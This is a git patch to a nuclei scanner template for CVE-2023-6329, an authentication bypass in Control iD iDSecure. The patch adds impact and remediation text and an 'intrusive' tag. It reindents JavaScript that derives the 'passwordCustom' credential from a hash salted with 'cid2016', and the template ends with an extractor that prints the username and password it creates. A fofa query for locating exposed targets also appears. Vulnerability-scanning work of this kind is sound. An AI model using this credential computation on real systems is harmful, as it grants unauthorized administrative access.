From c34971a3b2cd49053b73d57bd28fabddaffb50d2 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Thu, 5 Sep 2024 11:12:52 +0700
Subject: [PATCH] Update CVE-2023-6329.yaml

---
 http/cves/2023/CVE-2023-6329.yaml | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/http/cves/2023/CVE-2023-6329.yaml b/http/cves/2023/CVE-2023-6329.yaml
index 16f3d347c3..fc141e35ee 100644
--- a/http/cves/2023/CVE-2023-6329.yaml
+++ b/http/cves/2023/CVE-2023-6329.yaml
@@ -6,6 +6,10 @@ info:
   severity: critical
   description: |
     An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.
+  impact: |
+    Successful exploitation could allow an attacker to bypass authentication controls.
+  remediation: |
+    Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -20,7 +24,7 @@ info:
     vendor: controlid
     product: idsecure
     fofa-query: body="iDSecure"
-  tags: cve,cve2023,auth-bypass,idsecure,control-id
+  tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive
 
 variables:
   username: "{{rand_base(8)}}"
@@ -36,17 +40,16 @@ flow: |
 
 javascript:
   - code: |
-          var passwordRandom = passwordRandom;
-          var sha1Hash = template.sha1Hash;
-          var sha256Hash=(sha256combined.substring(0,6))
-          var passwordCustom = parseInt(sha256Hash, 16).toString();
-          passwordCustom
+      var passwordRandom = passwordRandom;
+      var sha1Hash = template.sha1Hash;
+      var sha256Hash=(sha256combined.substring(0,6))
+      var passwordCustom = parseInt(sha256Hash, 16).toString();
+      passwordCustom
     args:
       sha1Hash: "{{sha1Hash}}"
       sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}"
       passwordRandom: "{{passwordRandom}}"
 
-
 http:
   - raw:
       - |
@@ -114,4 +117,4 @@ http:
       - type: dsl
         dsl:
           - '"USER: "+ username'
-          - '"PASS: "+ password'
+          - '"PASS: "+ password'